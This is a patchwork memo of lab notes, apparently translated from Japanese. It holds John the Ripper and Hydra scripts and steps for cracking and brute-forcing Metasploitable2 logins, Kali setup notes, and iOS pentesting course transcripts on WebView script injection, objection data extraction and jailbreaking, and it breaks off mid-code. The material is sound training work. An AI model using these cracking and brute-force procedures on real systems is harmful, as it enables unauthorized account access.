
Password cracking memo

Posted at 2023-06-13

These are rough notes, written as a memo. I tried doing this with ChatGPT and AI.
There are many typos, but I am leaving them as they are, as a keepsake.

John the Ripper (full name: "John the Ripper password cracker") is one of the best-known password cracking tools.
It supports a wide range of hash algorithms: DES and MD5 as used for UNIX and Linux user passwords, NTLM as used for Windows logon, and many more.
Here we try cracking the passwords of Metasploitable2.
First, start the two virtual machines, Kali Linux and Metasploitable2, and check the IP address of each.
On Linux, account information is normally kept in two files: /etc/passwd and /etc/shadow.
The passwd file holds user attributes: user name, group, UID and GID, home directory, login shell and so on.
The shadow file holds user names and the corresponding password hashes, among other fields.
Normally it cannot be read without root privileges.
Now open another terminal window on Kali Linux and connect to Metasploitable2 over SSH.

B1.PNG

We are connected to Metasploitable2.
Next, obtain root privileges.
Root privileges obtained.
image.png

Display the passwd file under /etc.
B3.PNG

Highlight the contents of the passwd file and copy them to the clipboard.
B4.PNG

In the other terminal, create a new file and paste the passwd contents from the clipboard into it.
B5.PNG

Next, display the shadow file with the cat command.
B6.PNG

Highlight the displayed contents of the shadow file and copy them to the clipboard.
B7.PNG

On Kali Linux, create a new file,
B8.PNG

paste the shadow file contents from the clipboard into it, and save the file.
B9.PNG

From the two files copied from Metasploitable2 (passwd and shadow), generate a file in a format John the Ripper can process.
Use the unshadow command to combine the passwd file and the shadow file into a single file, password.db.
B10.PNG

Run John the Ripper against the generated password.db file.
B11.PNG

B12.PNG

Now, using a cracked user ID and password, check whether we can connect to Metasploitable2 over SSH.
B13.PNG

We confirmed that we can connect to Metasploitable2 using a password cracked with John the Ripper.
image.png
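The same procedure as a script, as an added example (not from the original memo): the unshadow step is done in awk so the merge is visible, followed by the john invocation. It assumes john is installed (Kali ships it) and that /usr/share/wordlists/rockyou.txt exists; the passwd and shadow lines in sample_passwd and sample_shadow are constructed test data with placeholder hashes, not copied from a real host.

```sh
#!/bin/sh
# Added example, not from the original memo: the unshadow step done in awk so
# the merge is visible, plus the john invocation that follows it.
# Assumptions: john is installed (Kali ships it), /usr/share/wordlists/rockyou.txt
# exists; sample_passwd/sample_shadow are constructed test data with placeholder
# hashes, not copied from a real host.

# merge_passwd_shadow PASSWD SHADOW
# Replaces the 'x' placeholder in each passwd line with the hash field from
# shadow, which is exactly the format `unshadow passwd shadow` writes.
# Accounts missing from shadow are passed through unchanged.
merge_passwd_shadow() {
    awk -F: 'NR == FNR { hash[$1] = $2; next }
             ($1 in hash) { $2 = hash[$1] }
             { print }' OFS=: "$2" "$1"
}

# crackable_accounts DBFILE
# Lists the accounts whose hash field is a real hash. Locked (!, !!, !$...)
# and disabled (*) entries are skipped; john ignores them anyway, but the
# list tells you up front how many accounts are actually in play.
crackable_accounts() {
    awk -F: '$2 != "" && $2 != "x" && $2 != "*" && $2 !~ /^!/ { print $1 }' "$1"
}

# crack_with_john DBFILE [WORDLIST]
# Wordlist mode first (fast, catches the default credentials Metasploitable2
# ships with); `--show` then prints user:password for everything cracked so
# far, reading john's pot file instead of re-running the attack.
crack_with_john() {
    john --wordlist="${2:-/usr/share/wordlists/rockyou.txt}" "$1"
    john --show "$1"
}

# Constructed sample input (placeholder hashes, not real credentials).
sample_passwd() {
    printf '%s\n' \
        'root:x:0:0:root:/root:/bin/bash' \
        'daemon:x:1:1:daemon:/usr/sbin:/bin/sh' \
        'msfadmin:x:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash'
}
sample_shadow() {
    printf '%s\n' \
        'root:$1$saltsalt$PLACEHOLDERHASH000000:14747:0:99999:7:::' \
        'daemon:*:14684:0:99999:7:::' \
        'msfadmin:$1$saltsalt$PLACEHOLDERHASH000001:14684:0:99999:7:::'
}

# Usage: sh jtr_unshadow.sh /path/to/passwd /path/to/shadow
if [ $# -eq 2 ]; then
    merge_passwd_shadow "$1" "$2" > password.db
    printf 'accounts with crackable hashes:\n'
    crackable_accounts password.db
    crack_with_john password.db
fi
```

Copying the two files by hand through the clipboard works for a lab, but on a real engagement you would scp them straight from the root shell so the hashes are never pasted into a terminal that may be logged; the merge function above is what unshadow does, so you can inspect the result before giving john a file that is mostly locked or disabled accounts.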

Next, I tried Hydra with AI

Here we test a brute-force attack using the password cracker Hydra.

First, start the two virtual machines, Kali Linux and Metasploitable2, and check the IP address of each.
Then check the usage with the help option.
Looking at the examples, we can see the command takes the form hydra -L userlist -P passwordlist target service: -L gives the user list, -P the password list, followed by the target IP address and the protocol.
B15.PNG


First, prepare the user ID and password dictionaries from the wordlists that come with Kali Linux.
B16.PNG

Running the ls command shows that many dictionaries are provided,
B17.PNG

and here we create the user list and the password list based on this dictionary.
B18.PNG

This dictionary has both a user ID and a password on each line, so we split it into users only and passwords only.
B19.PNG

First, with the cut command, extract only the user column and write it to a file named logins.txt under the home directory.
B20.PNG

Do the same for the passwords: extract that field and write it to a file named pwst.txt.
B21.PNG

Return to the home directory and check that the files were written correctly.
They appear to have been created correctly.
B22.PNG

Now we have the dictionaries to use with Hydra.
Run Hydra.
Enter the target IP address.
For the protocol, we use FTP here as an example.
B23.PNG

When cracking succeeds, the following output appears.
B24.PNG

Now check whether we can actually connect to Metasploitable2 with these credentials.
The ftp command does not seem to be installed, so here we connect to Metasploitable2 over SSH instead.
B25.PNG

B26.PNG

We confirmed that we could connect to Metasploitable2.
B27.PNG
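The wordlist preparation and the Hydra run as a script, as an added example (not from the original memo). It assumes hydra is installed, that TARGET is the Metasploitable2 address noted earlier, and that the default input is root_userpass.txt from the Metasploit wordlist directory listed below; the lines in sample_userpass are constructed test data in the same shape.

```sh
#!/bin/sh
# Added example, not from the original memo: build the login and password
# lists with cut as described above, then the hydra run that uses them.
# Assumptions: hydra is installed; TARGET is the Metasploitable2 address you
# noted earlier; the lines in sample_userpass are constructed test data.

# split_userpass FILE OUTDIR
# Metasploit *_userpass.txt files hold one "login password" pair per line,
# separated by a single space. -f1 is the login; -f2- keeps the rest of the
# line so a password that itself contains a space survives; -s drops lines
# with no separator at all. sort -u removes duplicates so hydra does not
# try the same pair twice (fewer attempts, less log noise on the target).
split_userpass() {
    mkdir -p "$2"
    cut -s -d ' ' -f1  "$1" | sort -u > "$2/logins.txt"
    cut -s -d ' ' -f2- "$1" | sort -u > "$2/pwst.txt"
}

# attempt_count LOGINS PWS
# -L/-P try every login against every password, so the cost is the product.
# Check this before starting: it is the number of logins the target will see.
attempt_count() {
    echo $(( $(wc -l < "$1") * $(wc -l < "$2") ))
}

# run_hydra TARGET SERVICE LOGINS PWS
# -t 4 keeps parallel connections modest (fine for vsftpd on Metasploitable2;
# on a real target more tasks mean more lockouts and louder logs), -f stops
# at the first valid pair, -o keeps hits in a file you can feed the ssh check.
run_hydra() {
    hydra -L "$3" -P "$4" -t 4 -f -o hydra_hits.txt "$2://$1"
}

# Constructed sample in the same shape as the Metasploit userpass lists
# (note the duplicated pair, which sort -u collapses).
sample_userpass() {
    printf '%s\n' \
        'msfadmin msfadmin' \
        'user user' \
        'service service' \
        'postgres postgres' \
        'msfadmin msfadmin' \
        'admin admin'
}

# Usage: sh hydra_lists.sh TARGET [ftp|ssh] [userpass.txt]
if [ $# -ge 1 ]; then
    split_userpass "${3:-/usr/share/wordlists/metasploit/root_userpass.txt}" "$HOME"
    printf 'attempts: %s\n' "$(attempt_count "$HOME/logins.txt" "$HOME/pwst.txt")"
    run_hydra "$1" "${2:-ftp}" "$HOME/logins.txt" "$HOME/pwst.txt"
fi
```

Splitting the pairs apart and recombining them with -L/-P turns N known pairs into N squared attempts; if you only want the pairs as listed, pass the original file to hydra with -C instead (see the Examples block in the help text below).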

I managed to do quite a bit with AI! It felt like "wow"!
Next I want to try a brute-force attack against a website login form.
Thanks for reading.

Reference: 【サイバーセキュリティ完全攻略】 (Cyber Security Complete Guide)

Additional memo
Find the password with Hydra first, then John the Ripper

Wordlist files
burnett_top_500.txt rservices_from_users.txt
cms400net_default_userpass.txt sap_common.txt
common_roots.txt sap_default.txt
dangerzone_a.txt sap_icm_paths.txt
dangerzone_b.txt scada_default_userpass.txt
db2_default_pass.txt sensitive_files.txt
db2_default_user.txt sensitive_files_win.txt
db2_default_userpass.txt http_owa_common.txt
default_pass_for_services_unhash.txt sid.txt
default_userpass_for_services_unhash.txt idrac_default_pass.txt
default_users_for_services_unhash.txt snmp_default_pass.txt
dlink_telnet_backdoor_userpass.txt idrac_default_user.txt
hci_oracle_passwords.csv tftp.txt
http_default_pass.txt ipmi_passwords.txt
http_default_userpass.txt ipmi_users.txt
http_default_users.txt joomla.txt
oracle_default_userpass.txt keyboard-patterns.txt
password.lst malicious_urls.txt
piata_ssh_userpass.txt mirai_pass.txt
postgres_default_pass.txt tomcat_mgr_default_pass.txt
postgres_default_user.txt tomcat_mgr_default_userpass.txt
postgres_default_userpass.txt tomcat_mgr_default_users.txt
root_userpass.txt unix_passwords.txt
routers_userpass.txt mirai_user.txt
rpc_names.txt mirai_user_pass.txt
vnc_passwords.txt unix_users.txt
multi_vendor_cctv_dvr_pass.txt vxworks_collide_20.txt
vxworks_common_20.txt

root@kali:/usr/share/wordlists/metasploit#			

Hydra analysis output
B28PNG.PNG

Final connection check
B29PNG.PNG

Hydra help
-h            more command line options (COMPLETE HELP)
server        the target: DNS, IP or 192.168.0.0/24 (this OR the -M option)
service       the service to crack (see below for supported protocols)
OPT           some service modules support additional input (-U for module help)

Supported services: adam6500 asterisk cisco cisco-enable cvs firebird ftp ftps http[s]-{head|get|post} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] mssql mysql nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres radmin2 rdp redis rexec rlogin rpcap rsh rtsp s7-300 sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey svn teamspeak telnet[s] vmauthd vnc xmpp

Hydra is a tool to guess/crack valid login/password pairs. Licensed under AGPL
v3.0. The newest version is always available at http://www.thc.org/thc-hydra
Don't use in military or secret service organizations, or for illegal purposes.
These services were not compiled in: afp ncp oracle sapr3.

Use HYDRA_PROXY_HTTP or HYDRA_PROXY environment variables for a proxy setup.
E.g. % export HYDRA_PROXY=socks5://l:p@127.0.0.1:9150 (or: socks4:// connect://)
     % export HYDRA_PROXY=connect_and_socks_proxylist.txt (up to 64 entries)
     % export HYDRA_PROXY_HTTP=http://login:pass@proxy:8080
     % export HYDRA_PROXY_HTTP=proxylist.txt (up to 64 entries)

Examples:
  hydra -l user -P passlist.txt ftp://192.168.0.1
  hydra -L userlist.txt -p defaultpw imap://192.168.0.1/PLAIN
  hydra -C defaults.txt -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5
  hydra -l admin -p password ftp://[192.168.0.0/24]/
  hydra -L logins.txt -P pws.txt -M targets.txt ssh

////////////////////////////////////////////////////////////////////////////////
1 Download VirtualBox
image.png
image.png

2 Go to the download location
image.png

3 Open the app
 Enter the command to extract it
image.png

4 Summary
image.png

1
Download from the Metasploitable2 page
image.png

2
Extract it
image.png

3
Click New in VirtualBox

4
Configure as follows, then "Next"
image.png

5
Configure the hardware as follows
image.png
image.png
image.png

The steps to install VirtualBox on Kali Linux are as follows.

Open a terminal. Right-click on the Kali Linux desktop and select "Open Terminal" (or the equivalent option).

In the terminal, run the following commands to bring the system up to date.

sudo apt update
sudo apt upgrade

To install the VirtualBox package, run the following command.

sudo apt install virtualbox

When installation is complete, run the following command to start VirtualBox.

virtualbox

Once VirtualBox starts normally, you can create and run virtual machines.

This installs VirtualBox on Kali Linux. You can create the virtual machines you need and run other operating systems in them.

Memo
https://seekt.hatenablog.com/entry/2022/05/22/085220

///////////////////////////////////////////////////////////////////////////
ssh -i "C:\Users\202101N034user\Desktop#key-seq001.pem" kali@10.10.46.35
deb http://kali.download/kali kali-rolling main contrib non-free non-free-firmware
Cannot initiate the connection to kali.download:80 (2606:4700::6812:6764). - connect (101: Network is unreachable) Cannot initiate the connection to kali.download:80 (2606:4700::6812:6664). - connect (101: Network is unreachable) Could not connect to kali.download:80 (104.18.102.100), connection timed out Could not connect to kali.download:80 (104.18.103.100), connection timed out
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done

All packages are up to date.
W: Failed to fetch http://kali.download/kali/dists/kali-rolling/InRelease Cannot initiate the connection to kali.download:80 (2606:4700::6812:6764). - connect (101: Network is unreachable) Cannot initiate the connection to kali.download:80 (2606:4700::6812:6664). - connect (101: Network is unreachable) Could not connect to kali.download:80 (104.18.102.100), connection timed out Could not connect to kali.download:80 (104.18.103.100), connection timed out
W: Some index files failed to download. They have been ignored, or old ones used instead.


This error message indicates a problem connecting to the Kali Linux package repository. There are a few things you can try. Note that in the output above the IPv6 attempts fail with "Network is unreachable" and the IPv4 attempts time out, which usually points at the VM's own network adapter (NAT or bridged mode, DNS, a captive portal) rather than at the mirror, so check the first item before changing mirrors.

Check the network connection: first, confirm that the internet connection is working. Check whether you can reach other websites and fix the network connection if needed.

Change the mirror server: the Kali Linux package repository downloads packages from a mirror server. If the mirror you cannot reach is the cause, you can try another mirror.

Edit the Kali Linux sources list. Run the following command in a terminal (use whichever editor you prefer):

sudo nano /etc/apt/sources.list

When the sources list file opens, find the line "deb http://kali.download/kali kali-rolling main contrib non-free non-free-firmware".

Add "#" at the start of this line to comment it out, and add the following line (you can leave the original line in place, commented out):

deb http://http.kali.org/kali kali-rolling main contrib non-free

Save and close the file.

Refresh the sources list and update the package index:

sudo apt update

Check that the package index was updated successfully.

If you cannot resolve the internet connection problem, you can also consider temporarily disabling the package repository.

Edit the sources list file (as before):

sudo nano /etc/apt/sources.list

Comment out the line "deb http://kali.download/kali kali-rolling main contrib non-free non-free-firmware" (add "#" at the start of the line).

Save and close the file.

If you disable the package repository you will not be able to update or install Kali Linux packages, but the system will keep running with the previously installed
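The two sources.list edits above as a script, as an added example (not from the original memo), so the change can be reviewed and re-run instead of being made by hand in nano. It assumes the file passed in is the standard single-line Kali sources.list; the replacement line uses https://http.kali.org, which is the same mirror as in the text but over TLS and with the non-free-firmware component that the original line also had (apt verifies the Release signature either way, so this only hides which packages you fetch, it does not change what apt trusts).

```sh
#!/bin/sh
# Added example, not from the original memo: the sources.list edit described
# above done with sed, idempotently, instead of by hand in nano.
# Assumptions: the file has the standard kali-rolling line; run it against
# /etc/apt/sources.list with sudo, then `apt update`.

KALI_LINE='deb https://http.kali.org/kali kali-rolling main contrib non-free non-free-firmware'

# rewrite_file FILE SED_EXPR
# Edits FILE through a temp file and copies the result back with cat, which
# keeps the original owner and mode (sed -i would also differ between
# GNU and BSD sed).
rewrite_file() {
    tmp=$(mktemp)
    sed "$2" "$1" > "$tmp" && cat "$tmp" > "$1"
    rm -f "$tmp"
}

# switch_kali_mirror FILE
# Comments out every active kali.download line and appends the http.kali.org
# line once; running it twice does not duplicate the entry.
switch_kali_mirror() {
    rewrite_file "$1" 's|^deb .*kali\.download/kali .*|# &|'
    grep -qxF "$KALI_LINE" "$1" || printf '%s\n' "$KALI_LINE" >> "$1"
}

# disable_kali_repo FILE
# The "temporarily disable" option: comments out every active deb line.
# apt update will then succeed trivially but install nothing new.
disable_kali_repo() {
    rewrite_file "$1" 's|^deb |# deb |'
}

# Usage: sudo sh kali_mirror.sh /etc/apt/sources.list && sudo apt update
if [ $# -eq 1 ]; then
    switch_kali_mirror "$1"
fi
```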

///////////////////////////////////////////////////////////////////////////
The steps to install VirtualBox on Kali Linux are shown below. Kali Linux's default repository includes VirtualBox, so it can be installed with the package manager.

1 Open a terminal.
2 Run the following commands to update and upgrade.

sudo apt update
sudo apt upgrade

3 Run the following command to install VirtualBox.
sudo apt install virtualbox

4 When installation starts, packages are downloaded and dependencies are resolved. If a confirmation prompt appears, type Y and press Enter.
5 When installation finishes, VirtualBox is installed on Kali Linux.

VirtualBox is now installed on Kali Linux. You can start it by typing virtualbox in a terminal and pressing Enter, or from the application menu.

Note: installing VirtualBox inside Kali Linux is not required. Kali is normally run as a guest VM itself, and you only need VirtualBox inside Kali if you want to run further virtual machines from within it.

///////////////////////////////////////////////

image.png

Additional
image.png
image.png

image.png

image.png

image.png

image.png

image.png

Execution
image.png

image.png

image.png

image.png

///////////////////////////////////////////////////////////////////
WebView XSS

Now let's see a client-side injection vulnerability in the Secure Store application. This client-side vulnerability is caused by the use of WebViews. If you remember, our application's About Us feature fetches an HTML page from a remote server. Now let's quickly check how this page is being loaded. I am trying to retrieve the page once again. Look at that: it is basically making an HTTP request. Let me right-click, click on "Do intercept, response to this request" and forward it. Look at that: we are getting an HTML response for this page.

Now what we can do is add some additional JavaScript here, such as <script>alert("hacked")</script>, forward this, and let me show you what happened on the screen. Look at that. So basically, somebody who is able to do a man-in-the-middle attack against this application in a coffee shop can tamper with the responses coming to this application and inject JavaScript that will be executed by this app. Instead of showing an alert box, it is possible to display a phishing page into which the victim may enter their credentials, leading to a phishing attack. This is how client-side attacks are also possible in iOS applications.

///////////////////////////////////////////////////////////////////
Insecure local data storage vulnerability - non-jailbroken device

...deploy the application in debug mode. As you can see, the application is now waiting for a connection. Now let's open up another tab and type objection explore. So basically we are going to use the objection tool to explore the local data storage of the application. After running objection explore, the application should be launched. This is the screen that we usually see when we launch the application. Once again, we will have to configure the server, so let's first configure the server using the IP address of the Secure Store server, and let's quickly check whether we are able to communicate with the server. Yes, we are. So now let's quickly log in using the securestore account and tap on Sign In. There you go. Now let's enter some local data into this application: let's type a branch name and email ID. Let's tap on Save Bank Details and try to retrieve them as well, just to confirm that the app is functioning fine. There you go.

Okay. Now, what we're interested in is the local data storage of this app on this device. objection supports both Android and iOS devices, but we are only going to see the iOS-specific features in this course. Let's type env. That's the first command that I always run when I do any iOS security assessment using objection. Look at that: it gives us all the paths that we are interested in. The first one is the bundle path, so we can see the actual binary of this application inside this folder. This is the Caches folder, and this is the Documents directory, which is what we explored earlier and where we spotted a lot of sensitive data. Let's copy this and navigate to this directory by pasting it here. Let's hit Enter and type ls. If you look at the output, you are able to explore the file system of this app using objection, from this objection terminal. We can also run commands on the laptop: to do that, we just have to prefix the command with a bang, or exclamation mark. Look at that. If I type ls on its own, the command is executed in objection's shell; if you prefix the command with the exclamation mark, it is executed on your laptop.

Now, what we are interested in is the contents of these files. There are two options within objection: we can download the file onto the laptop and view the contents there, or we can view the file contents using the file command, with cat and the name of the file. As you can see, objection is already showing us the list of files we have in this directory. What we are interested in is userdetails.plist. Look at that: objection is able to read the file for us. Nice. The next one that I want to show is file download. Let's type file download, and look at that: it automatically shows us the list of files that are available for download. Let's try to download this bankdetails.db, and look at that, it is downloaded into the current directory. This is the current directory on my local machine, so let's quickly copy this and see whether the file has been downloaded into this directory. Look at that, there is a file called bankdetails.db.

Now, we don't have to download these DB files onto the local machine, because objection also comes with a utility called sqlite. So if you look at this: sqlite connect bankdetails.db. Look at that, we are able to connect to the bankdetails.db file right from the objection shell. So now we can type .tables. Look at that. This is much better in terms of appearance, so we can actually use objection itself instead of going back to the shell on the laptop. This is the table that we have got. Let's type select * from bankdetails, and look at that: that is a very nice representation of this data. This is how we can explore local data storage using objection on non-jailbroken devices.

//////////////////////////////////////////////////////////////////////
Download the vulnerable apps from the link provided below (minimum iOS version: iOS 12):

Bundle identifiers: cst.securestorev1 and cst.securestorev2

Download the vulnerable apps from the link provided below (minimum iOS version: iOS 10):

Bundle identifiers: cst.securestorev1.1 and cst.securestorev2.1

Download the vulnerable apps from the link provided below (for iPhone SE 1st generation):

Bundle identifiers: cst.securestorev1.2 and cst.securestorev2.2

Download the backend server from the link provided below:

Usage: import the OVA file into VirtualBox and connect it in bridged network mode, so that the server is reachable by the apps we are testing.

Credentials to log in:

Username: securestore

Password: securestore

Default user accounts available to log in from the app (you can also register a new account using the signup feature):

+-------------+-------------+
| username    | password    |
+-------------+-------------+
| securestore | securestore |
| attacker    | attacker    |
+-------------+-------------+
///////////////////////////////////////////////////////////////////
Lab setup using a jailbroken iDevice

Now let's see how we can set up a lab using our jailbroken iPhone. Obviously we need to have an iPhone which is jailbroken to be able to follow the instructions in this lab. How to jailbreak an iPhone is out of scope for this course, but let me quickly show you how I have jailbroken my device. I am switching to a browser, and as I mentioned earlier, the device that I have jailbroken is running iOS 12.4. So I have gone ahead and searched online for jailbreak exploits which can be used to jailbreak my device, which is an iPhone 6s running iOS 12.4, and I found checkra1n. If you look at this, this is the latest release that I have used here, and this release basically fixes an issue in 12.4, which is exactly what I have in my hand: it appears that this software was causing the device to panic and reboot on attempted shutdown. I'm pretty lucky that I have a working exploit available when I wanted it, so I have just gone ahead and downloaded this for macOS, started this application, connected the device, and the application shows the step-by-step procedure to jailbreak the device. So that's how I have jailbroken my device. It is recommended to have a jailbroken device, because the setup is going to be pretty easy if you have one, but if you don't have it, it's fine: we are going to do everything on a non-jailbroken device as well. All right, so let me switch back to my slides.

Once after jailbreaking the iPhone, you will see an application called Cydia. Let me project the screen of my iPhone. Okay, so this is how the jailbroken iPhone looks. You can see there is an application called Cydia. Cydia is something like the App Store, from where we can download tools that are useful for pentesting. Now I'm going to use Cydia to download OpenSSH; this is the first tool that I usually download after jailbreaking any device. So I'm going to search for OpenSSH, click on that, click Install and confirm, and this should download OpenSSH for me. All right, so let me tap on Return to Cydia, because OpenSSH is now installed. Once that is done, let's go back to Sources, click on Edit, click on Add, add another repo, build.frida.re, and tap on this Add Source button. There you go. So it is verifying the URL, and this repo should be added to our Cydia. Okay, let's return to Cydia, and once that is done we should see build.frida.re there. Let's tap on that and go to All Packages. As you can see, I have installed Frida for pre-A12 devices. If we install this, it is going to install Frida server onto the device, and using Frida server, as you can see from the description here, we can inject JavaScript to explore iOS applications over USB. We are going to see how we can do that later, but for now just install Frida server by choosing the appropriate option here. In my case my device is a pre-A12 device. You can check your model and see which chip is used in your device, so depending on the chip that is used in your device you need to install the A12+ or the pre-A12 version, or if it is a 32-bit device, you should probably go for the 32-bit version of Frida server. Once this is done, we are pretty much done, since we now have Frida server on the device.

We need to have the Frida client on the laptop, because it's a client-server-based setup, so we need to install a client on the local machine. So let's switch to the terminal and install Frida. But before that, I would like to make another point: we also need to install objection. objection is another tool which is built on top of Frida, and it can be used to perform runtime manipulation of applications. It's not just runtime manipulation, we can do much more than that, but I usually use objection for runtime manipulation in most cases. In this course we are going to see other use cases of objection as well, such as exploring local data storage and so on. The reason why I have included objection here is that if we install objection on our local machine, it will automatically install Frida for us. So let's go ahead and install objection on the laptop. In my case I have already done that, but let me quickly show you how to install it from the GitHub page. Let's scroll down, and as you see, the installation is pretty simple: all you have to do is type pip3 install objection, right? Once that is done you will have objection and Frida installed on the laptop. In some cases Frida and objection may not be in the PATH. That's what happened in my case: my Frida and objection were installed, but when I tried to invoke them from the terminal, I got "objection not found" and "frida not found". The reason is that they are not added to the system PATH, so if you face this problem you will have to manually add those binaries to your system PATH.

Once you are done with the installation of objection and Frida, we want to verify the setup that we have done so far. Number one, I want to verify my SSH connection. Number two, I want to verify that Frida server is running fine. Number three, I want to verify objection. Let's first begin with the SSH setup: ssh root@192.168.0.102. We can check the IP address of the iPhone from the Wi-Fi settings; this is how it looks. So in my case it is 192.168.0.102, and I'm hitting Enter. By default, when you install OpenSSH from Cydia, the password is alpine, so I have just entered alpine and I am able to log into the device. This is the spelling of alpine, and this is the default password of OpenSSH when you install it from Cydia. Right, so this confirms that my SSH setup is working fine.

Now let's go ahead and check whether Frida is working fine. To do a quick smoke test, we can run frida-ps -U. -U specifies that my device is connected over USB, and Frida is going to make a connection with the Frida server using the USB connection. So let's type frida-ps -Uai so that we get the list of bundle identifiers of the applications that are installed on the device, and let's grep for mail. As you can see, the Mail application is installed, and my Frida client is able to list the bundle identifier of this application. Similarly, we can list all the applications that are installed on the device. You can also see the application that I have shown you earlier, and you can see the application that is running on the device. So essentially this Frida client is able to communicate with the Frida server, and it is able to list all the apps that are installed on the device. That's perfect, so the Frida setup is working fine.

Now let me quickly check the objection setup as well. As you can see, objection is installed on my laptop. If we want to quickly check whether objection is able to connect to the device, we can do that by getting the bundle identifier of the Mail application once again, and let's try to use objection --gadget with this bundle identifier and type explore. I'm going to start the Mail application on my device and hit Enter. As you can see, objection is able to hook into this Mail application which is running on my iPhone, so this confirms that objection is working fine and we are good to go.

Let me go back to the slides. I'm pretty much done with what I wanted to show in this video. We have installed OpenSSH using Cydia, we have installed Frida server, we have installed objection on the laptop, and we have also installed the Frida client on the laptop by installing objection. Finally we have verified the SSH, Frida and objection setup. So that brings us to the end of this video. In the next video we are going to discuss how to install the vulnerable applications on the jailbroken

////////////////////////////////////////////////////////////////////

安全でないローカル データ ストレージの脆弱性
In this video.

Let's talk about insecure data storage.

Finding out insecure data storage vulnerabilities on an application requires you to have a jailbroken

device.

It is also possible for us to view the applications local storage on a non-jailbroken device using the

setup that we have.

So I'm going to demonstrate insecure data storage vulnerabilities both on a non-jailbroken device as

well as on a jailbroken device.

Okay, so now let's get started.

Mobile apps often store data on client side.

If you remember when we started the application for the first time, it was telling us that the server

is not configured.

How is it possible for the application to determine that the server is not yet configured?

It is making some client side check to see if a specific file exists.

If the server is already configured, the file exists and the app will not show us the message again.

Right.

So that means the app is storing something on the client side to do some tasks.

Similarly, some developers make a mistake of storing sensitive data on the client side.

While it is required for us to have jailbroken device to be able to access this data.

It is not a best practice to save sensitive data in clear text on the local storage.

Right?

So that's what exactly we are going to see in the vulnerable application in this video.

So these are the few ways that apps use to store local data.

Plist files NS user Defaults, SQLite databases, core data and keychain Plist file is something like

an XML file that can be used to store key value pairs and NS user defaults is also something similar

and SQLite databases are lightweight databases that can be used to store and retrieve data, and core

data is also something like SQLite databases and Keychain is Apple's recommended way of storing sensitive

data on the device.

In this course we are not going to go through every single type.

We will cover some of these based on the applications functionalities.

So the vulnerable application that we are going to use may store some sensitive data on the client side.

So let's go ahead and explore if it is storing any data on the client side using any of these techniques.

First we are going to do it on a jailbroken device and after that we are going to use a non jailbroken

device.

Okay.

So let's switch to a terminal and let me quickly find out the IP address of this device.

This is 102 SSH route at 192.168.0.102.

And let's enter the password.

And

now let's launch the application.

And let's first log in using secure store account.

And let's tap sign in.

Now let's tap on view profile once again just to make sure that we are browsing through the entire application.

Now let's enter some test data into this application.

This is like a secret vault application.

We can basically store some bank account numbers into this app, and when we want to view the information,

we can retrieve that.

So let's see how this app is storing all this data.

Bank name.

Let me enter test account number one, two, three, four, five, six, seven.

There are no restrictions on the client side, so you can basically enter anything.

But there are some basic validations.

Like if you don't enter every field, it is going to throw an error.

Similarly, if you try to retrieve something without entering an email ID, it will once again throw

an error.

Right.

The branch name test and email id test at test.com and let's tap on save bank details.

As you can see, your data has been saved successfully.

Now test@test.com

and let's tap on show bank details.

As you can see, it is retrieving whatever the data that we have entered, that's fine.

Now let's go ahead and explore the local file system of this app.

On the jailbroken device, as I mentioned earlier, the data directory is inside slash var.

Mobile.

Uppercase C containers.

Data application.

And inside this we will have some uuids.

Every time you install an application, it gets a new Uuid by the device.

Now we don't know the device Uuid yet, so let's just navigate to this directory first and we are going

to use some Linux foo to find out the directory of this application.

Let's type, find dash type and let's specify that it's a directory and let's specify the name of the

directory.

This has to be the bundle identifier of this app.

So it has to be CSD dot secure store.

We won.

So this is the bundle identifier of secure store v1 application.

So let's hit enter.

As you can see, it has identified the bundle identifier and this is the location of our application.

So let's navigate to this and let's type LS There are four different directories here, so let's navigate

to documents.

And there are some interesting files here.

One is bank details dot DB.

And another one is config dot plist.

First run dot p list and user details dot p list.

Since we don't need this mobile screen anymore, let me just expand it here.

Now.

What we are interested in is we are interested in all of them.

So let's go through one by one.

I will begin with this first run dot P list.

Let me copy this and type cat and paste the file name.

And if you look at this, it says is first run set to false.

So that means the app is already run.

Okay, so this file is not so interesting.

So let's go to the next one.

Let's go to config dot p list.

I'm going to open config dot playlist using cat.

And if you look at this, this p list file has the server IP address.

This is the server that we have configured.

So once again, not so interesting.

Anyway, we can see this IP address in Burpsuite.

Now let's go back and let's check out the next file which is user details dot P list.

Let's copy this and let's paste it and look at that.

It has an authentication token of a specific user and the username of that user is secure store and

it says he is logged in.

Now it is very common in bug bounty programs that if you find something like this on client side, they

will probably reject it.

Now what we have to do is we will have to turn this local storage vulnerability into something more

valuable.

So we are going to see how we can turn this into an authorization vulnerability later in this course.

But for now, remember, this is how you can explore the local data storage to find out sensitive data

that is stored by the app.

Now let's move on.

And there is one more file that is of our interest, which is bank details dot DB.

Let's check what kind of file it is by typing file space bank details dot db.

As you can see, this is a SQLite file, so we need to have a SQLite client like this.

Looks like we don't have any SQLite client on this device.

That's fine.

We can just pull this file out and we can explore it on the local machine.

So what I'm going to do is I'm going to desktop iOS Pentesting and here I'm going to make a new directory called Local Storage.

And I'm navigating there and here I'm going to download that using sftp 192.168.0.102 and let's enter the password and let's provide the path of this particular file.

And let's type get slash bank details dot db.

As you can see, the file has been pulled out.

Now let's quit.

And if you see the local storage folder, we do have a new file called Bank Details Dot DB.

Now let's once again run file command against it just to confirm that the file is intact.

Now let's use a SQLite command line client to connect to this and explore the database.

Okay.

We have connected to the database.

Now let's type dot tables.

There you go.

We can see the table names inside this.

We do have a table called Bank Details.

So let's run some basic SQL query to see if there is anything interesting in this table.

So select star from bank details.

Looks like there is something wrong here.

There is no from. From is missing there.

And there you go.

This is what we have entered into the application.

This application is meant to be a secret vault.

It has to keep the secrets secret.

But it is exposing everything in clear text because the data that is entered into the app is being stored on the disk in clear text.

Right.

So this is how we can identify local storage vulnerabilities in a jailbroken device.

In the next video, we are going to see how to explore local data storage using a non-jailbroken device.
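The kind of check walked through above, as an added example that is not part of the original course or this post: a small Python audit that takes a pulled-out copy of an app's Documents directory, identifies plist and SQLite files by their signature (the way the file command does), and flags keys or columns whose names suggest sensitive data sitting on disk in clear text. The Documents contents it scans are constructed in a temporary directory; the file names follow the walkthrough, while the key names, column names and values are assumptions.

```python
import plistlib, re, sqlite3, tempfile
from pathlib import Path

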